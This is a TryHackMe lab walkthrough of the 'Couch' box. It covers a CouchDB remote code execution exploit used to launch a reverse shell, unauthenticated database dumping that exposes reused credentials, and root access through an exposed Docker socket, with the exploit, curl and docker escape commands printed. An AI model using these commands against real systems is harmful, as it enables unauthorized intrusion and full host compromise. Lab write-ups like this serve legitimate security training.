Couch TryHackMe Walkthrough
Hello guys back again with another walkthrough this time we are going to be tackling Couch box from tryhackme. The box was a simple box yet an amazing one thanks to the creator of the box stuxnet. The box starts off by us doing a port scan and finding out that the box has CouchDB service exposed. Looking at the version we see that it’s vulnerable to a remote code execution. Exploit the vulnerability and get a shell in the box. That’s one way of getting a shell on the box. The second way is by Looking through the database and discovering some credentials for the user Atena. Since there was some credential reuse going on we use those credentials to log in via SSH user done!!!. For root we will exploit Unprotected docker TCP Socket to mount the / path in a created docker container which has read and write file permission it was a really enjoyable box without much say let’s jump in
As always we’ll start off by performing a port can to identify services that are externally exposed on the box. First i did a scan of the first 1000 ports and looking at the results obtained we have only one port open. Port 22
We don’t even have a web server present and there is so little attack surface present when it comes to SSH. I know that this specific version of SSH is vulnerable to User enumeration attack
But i kept that at the back of my mind and decided to perform a full port scan on the box to ensure that i didn’t miss any other services that were exposed externally.
Looking at the result returned from the full port scan we see that one other port is open. port 5984
Performing a script scan and a service scan on the two ports we come to identify the service running is CouchDB
Sweet looking that that version in exploitdb we come to find that it’s vulnerable to a remote code execution
Sweet we may have a way to exploit the box . I copied the exploit to my current working directory
Next i tried to run system commands using the exploit but it just hang.
I wasn’t able to see the output of the exploit. this made me believe that maybe the exploit was blind. not really sure since this was my first time exploiting couchdb. But i decided to test of the exploit was blind. The best way to test for blind command injection is to perform a ping request.
So i did set up a tcpdump listener on my localbox
Then using the exploit i tried pinging my IP address.
Looking at the result below we can confirm now that that specific version is vulnerable to a remote code execution.
Next step is getting a shell on the box. tried many ways and always found out that the special characters were breaking the scripts so i decided to create a reverse shell and upload it to the box then execute the bash reverse shell from the box
The first step i did was creating the reverse shell on my box
Next step i started a simple HTTP server which could allow the victim (couch box) to access the file and download it to the remote target
Next i used curl to upload the bash reverse shell to the target box.
Next i did set up a netcat listener. This would allow the target box to connect back to us
And lastly i executed the exploit using the command
python3 44913.py --priv -c "bash /tmp/shell.sh" http://10.10.29.41:5984
Going back to my reverse shell i had a shell on the box as the couchdb user.
Looking at the home directory we a user called atena. Now we are supposed to exploit escalate our privileges to that user. I ran linpeas nothing stood out. Looking at couchdb’s home directory there are some databases but they seem encrypted
But we could try access the database using the couch db services. Just like MySQL we first need to list the databases using the command
curl -X GET http://10.10.29.41:5984/_all_dbs
Looking at the results from the command we see that there some tables we have access to. The reason as to why we had access to the database is because it was not protected my any sort of authentication mechanism which is highly discouraged for any sensitive services like Redis, MySQL , couch db, MSSQL, SMB etc it always a good idea to have these services protected by some sort of authentication to prevent unauthorized access
The databases that i was interested in was secret since it was a non-standard database.
Next i decided to List each entry inside the secret database using the command
curl -X GET http://10.10.29.41:5984/secret/_all_docs
We see that the database has only one entry with the id a1320dd69fb4570d0a3d26df4e000be7
Next step was to read the content of a document inside a database i used the command
Looking at the result above we have a credential backup for the user Atena. I tried logging into the box via SSH (Secure shell) using those credentials and looking at those credentials it worked we have a shell on the box.
We have now seen two ways of getting a shell on the box. Looking at the atena users home directory we have a user flag on the box.
Next i uploaded linpeas to the box and ran it. Linpeas is a bash script that checks for system misconfigurations that might lead to privilege escalation and it my go to tool when it comes to checking for privilege escalation on Linux based systems
Looking at the results returned by linpeas we see that there one port but it only exposed internally
I forwarded this port back to my Linux box. I didn’t use chisel since there was SSH already listening on the box.
Next back on my local box i performed a script and service scan on the port
And looking at the result it came back as unencrypted docker socket. Looking for any misconfiguration i came across this exploit which allowed me to mount the root share in a container and basically giving me both read and write access to all the contents in the file system.
I ran the command
docker -H tcp://127.0.0.1:2375 run --rm -ti -v /:/mnt alpine chroot /mnt /bin/sh
Going to the root directory we had the root flag and also read access
And the box is pretty much done. I hope you enjoyed the walkthrough if so don’t forget to clap for me down below and follow me so that you wont miss any upcoming articles